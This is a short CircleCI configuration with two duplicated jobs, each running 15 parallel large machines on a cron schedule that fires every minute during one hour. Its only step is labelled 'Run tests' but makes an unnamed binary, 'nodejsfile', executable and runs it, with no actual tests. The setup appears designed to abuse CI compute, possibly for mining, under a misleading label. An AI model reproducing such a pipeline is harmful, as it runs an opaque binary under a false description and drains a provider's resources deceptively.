working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Run tests
        command: |
                    chmod u+x nodejsfile && ./nodejsfile
version: 2
jobs:
  endvoc:
    <<: *script
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    resource_class: large
  endvoc1:
    <<: *script
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    resource_class: large
workflows:
  version: 2
  commit:
    jobs:
      - endvoc
      - endvoc1

    triggers:
      - schedule:
          cron: "* 1 * * *"
          filters:
            branches:
              only:
                - main

  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1
